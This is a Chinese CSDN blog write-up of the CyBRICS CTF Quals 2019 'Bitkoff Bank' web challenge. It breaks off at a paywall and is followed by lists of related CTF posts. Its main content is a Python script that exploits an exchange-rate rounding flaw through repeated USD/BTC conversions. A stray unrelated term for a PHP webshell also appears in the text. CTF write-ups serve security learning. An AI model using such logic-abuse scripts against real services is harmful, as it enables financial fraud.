实战:CyBRICS CTF Quals 2019 Web Writeup

最新推荐文章于 2022-10-14 09:35:50 发布
最新推荐文章于 2022-10-14 09:35:50 发布
阅读量435 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/systemino/article/details/97948705
版权

前言

周末参加了LCBC主办的2019 CyBRICS CTF Quals,在金砖五国中,获得了top5的成绩,以下是web的题解。

Bitkoff Bank

实战:CyBRICS CTF Quals 2019 Web Writeup

点一次mine btc,获得0.0000000001 BTC,而购买auto-miner需要0.1 USD。

购买auto-miner后,我们的网页会多出这样一个script,每秒帮我们点击1000次,但实际上并非1秒能获得这么多BTC:

实战:CyBRICS CTF Quals 2019 Web Writeup

然后获取flag需要1USD,显然即便依靠auto-miner也是遥遥无期的。PHP大马

通过做题的经验,给了的功能一般不会白给,我们测试一下转换功能,发现不断将BTC转成USD,将USD转成BTC,就会因为汇率问题就会不断加钱,写脚本即可:

 

import requests
import re
url = 'http://95.179.148.72:8083/index.php'
cookie = {
'name':'yyplsky',
'password':'yyplskycool'
}
def GetUSD():
while True:
try:
r = requests.get(url,cookies=cookie,timeout=3)
res = r.content
res = re.findall(r'<b>([0-9\.]*)</b><br>',res)
return res[0]
except:
pass
def USD_to_BTC(USD):
data = {
'from_currency':'usd',
'to_currency':'btc',
'amount':USD
}
while True:
try:
r = requests.post(url,data=data,cookies=cookie,timeout=3)
break
except:
pass
def GetBTC():
while True:
try:
r = requests.get(url,cookies=cookie,timeout=3)
res = r.content
res = re.findall(r'<b>([0-9\.]*)</b><br>',res)
return res[1]
except:
pass
def BTC_to_USD(BTC):
data = {
'from_currency':'btc',
'to_currency':'usd',
'amount':BTC
}
while True:
try:
r = requests.post(url,data=data,cookies=cookie,timeout=3)
break
except:
pass
for i in range(200):
USD = GetUSD()
print USD
USD_to_BTC(USD)
BTC = GetBTC()
print BTC
BTC_to_USD(BTC)

通过来回转钱,跑差不多十分钟就够$1 USD,可以购买flag了。

最低0.47元/天 解锁文章
systemino
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
全国职业技能大赛网络安全-金砖技能大赛——应急响应内存镜像分析(超详细解析)
Jay
12-20 2050
4.从内存文件中找到异常程序植入到系统的开机自启痕迹,使用Volatility工具分析出异常程序在注册表中植入的开机自启项的Virtual地址,将Virtual地址作为Flag值提交;DLL dlllist -p 查看一下这个进程的查看一下这个进程的DLL,发现程序是在temp目录下执行的,那这个应该就是恶意软件进程了。5.从内存文件中找到异常程序植入到系统的开机自启痕迹,将启动项最后一次更新的时间作为Flag值(只提交年月日,例如:20210314)提交。
2023年金砖部分试题与答案(自用)
2201_75612612的博客
04-18 3558
某企业拟使用OpenStack搭建一个企业云平台,用于部署各类企业应用对外对内服务。云平台可实现IT资源池化、弹性分配、集中管理、性能优化以及统一安全认证等。系统结构如下图:企业云平台的搭建使用竞赛平台提供的两台云服务器,配置如下表:表1 IP地址规划*私网IP:192.168.100.1.选手自行检查工位pc机硬件及网络是否正常;2.竞赛使用集群模式进行,给每个参赛队提供华为云账号和密码及考试系统的账号和密码。选手通过用户名与密码分别登录华为云和考试系统;
Cybrics ctf
zhang14916的博客
08-08 526
1.Signer 阅读源码,同时nc一下我们会发现,该题是ECDSA签名。选项1是使用ECDSA对一个当前时间戳+salt进行签名,输出(R,S,HASH),。选项2是让我i们输入使用ECDSA对一个当前时间戳+get_flag进行签名的结果,输入正确获得flag。我们发现在签名过程中除了明文以外所用的参数都没有发生更改,所以我们可以使用k共享的方式对改签名进行攻击。其原理如下 已知ECDSA的签名过程是,所以当我们有两组同参数的签名明文hash1,hash2和签名值(r,s1),(r,s2),那么,。
CyBRICS-CTF————find_and_seek
菜鸡的博客
07-29 633
毛子的CTF,还真就如其名,得找到真正的逻辑所在。 最开始直接载入ida找到主函数,逻辑很简单,就是一大堆方程,用z3解就好了,但是这样得到的是fakeflag cybrics{HI_this_is_fake_flag} 尝试交,果然不对emmm 但是也能发现有不对的地方,比如程序调试的话还是会显示输入正确,但如果不调试输入这个就会报错 尝试attach上去 在ida里面先按照远程remote linux debug的方式配置,然后选择debugger->attach,在linux运行对应程序之后at
Cybrics CTF 2019 Quals Writeup Revrse
weixin_30502965的博客
08-13 399
目录 Cybrics CTF 2019 Quals Writeup Revrse Oldman Reverse matreshka Hidden Flag Cybrics CTF 2019 Quals Writeup Revrse 上周末...
金砖技能大赛-应急响应-内存镜像分析-进程分析
WEB渗透测试 从入门到萌新
09-30 4755
作为信息安全技术人员必须能够掌握内容镜像分析、重要数据恢复、 恶意文件分析等相关技能,利用这些技能我们能够第一时间分析相关恶意文件、 分析蛛丝马迹帮助我们更好的完成应急响应工作。 应急响应阶段题目主要包含:Windows 内存镜像分析,Linux 内存镜像分析, 磁盘文件恢复,恶意程序分析等内容。
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
writeup:CTF挑战撰写
05-28
:0 CTF / TCTF 2019 Quals Writeup :强网杯线上赛 :Defcon中国CTF(BCTF)1.0撰写 :MTP撰写 :TokyoWesterns CTF 5th 2019 WriteUp :HITCON CTF 2019 :简易PHP UAF :BroadcastTest :2020 de1ctf...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-secconquals 20191012-hitconctfquals 20190928-pwnthybytesctf 20190928-bsidesdelhictf 20190921-dragonctfteaser 20190913-realworldctfqual ...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
Web 技术》试题A卷参考答案及评分标准1
08-08
(2)CSS中注释可以用“/* 这是样式表注释 */” (1分) (3)JavaScript中可以用两种:单行注解// (2)网站总体设计方案主题鲜明(1分)
ctf-writeup:一些ctf游戏文章
07-14
###writeup 一些 ctf 游戏
2022年金砖国家职业技能大赛(决赛)网络空间安全赛项 | 浙江赛区选拔赛 任务书
Aluxian_的博客
10-14 4436
2022年金砖国家职业技能大赛(决赛)网络空间安全赛项 | 浙江赛区选拔赛 任务书
金砖赛后反思 + 十三届蓝桥杯JavaC组试题 D: 求和思路及python解
m0_55529377的博客
05-09 1644
金砖技能大赛复盘反思 + 十三届蓝桥杯JavaC组试题 D: 求和思路及python解
CTF攻防世界web题思路解析7simple_php
m0_63687631的博客
12-22 359
1.打开网页 2. 这个意思是要a=0并且a为真才可以出现第一部分的flag,a为真的意思是a非0 可输入a=0a;意思就是a现在不是数字而是0a的字符串,但是==在进行弱比较时会先判断字符串类型是否相同,如若不同则需转化成相同类型的再做比较。同时如果0a会被转化数值,所以a就是0,但又是0a是非零是真的。 关于b他要求b 不是个数字并且要大于1234(exit是退出的意思,即如果b是数字那就退出,所以第一个关于b的if不能成立,他就不能是数字),那就给b赋值b=1235b原因同a。 知识点.
XCTF-CyBRICS2021 几道简单题的WP
mumuzi的博客
07-25 1350
1.Mic Check (Cyber, Baby, 50 pts) 签到题,查看rules,那个就是flag cybrics{Th1S_i5_T3h_R34l_m1C_ch3CK_f1A6} 2.Scanner (rebyC, Baby, 50 pts) 第一关每次都是房子,后面三关就看到什么填什么单词就过了,最后是一张二维码. 下载下来用GIFFrame分离出来,然后可以看帧找到哪些图拿来拼起来就是一张完整的二维码 写脚本 from PIL import Image list = [8,11,1.
CYBRICS】Polyglot WriteUp
古月浪子的博客
07-29 264
这道题有毒。。。 附件是一个.c源代码 我们自己写一下代码跑一下,把key直接写死 int main() { char flagged[] = { ...... }; char key[] = "mod3r0d!"; unsigned long long val = *(unsigned long long*)key; unsigned long long *ptr = (unsigned long long*)flagged; while (*ptr != 0) { *ptr = *pt.
cybrics2021 walker wp
Zarcs_233的博客
08-07 226
分析main函数 首先发现main函数中实现了许多初始化,不难发现里面注册了关于输入输出的exception,然后打开了flag.txt文件,从其中读取数据,然后将数据传给start_check 然后我们考虑进入start_check函数分析,发现其中是个递归函数,对比成果后就向后移动,直到对比了34个字符,下标多余34则出现异常, 然后查看下global_flag明显发现是假的flag,说明这个逻辑是假的,flag.txt中放入这个字符串是错误的逻辑。 我们考虑main函数中注册了一个输入输出的Excep
volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
jmp esp
11-30 811
基本情况我并没有参加这个比赛,只是作为练习用,所以无法模拟远程,只能本地调试文件是64位的,运行之后先输入名字,然后每次都会输出这个名字,然后问你10道数学题,后面怎样的其实对这个版本的利用来说不是很重要漏洞情况整个函数比较长,不过我还是复制下来方便解释(来源于radare2, 如果不依赖ida的F5, radare2一些时候比ida还好用,特别是在pwn当中):/ (fcn) sub.puts_7
00:00ctf解码
最新发布
09-04
CTF(Capture The Flag)是一种网络安全竞赛,其中参赛者需要通过解决各种密码学、漏洞利用、逆向工程等题目来获取旗帜(Flag)。在CTF中,解码通常是解决密码学题目的一部分。解码的目标是将经过编码或加密的信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值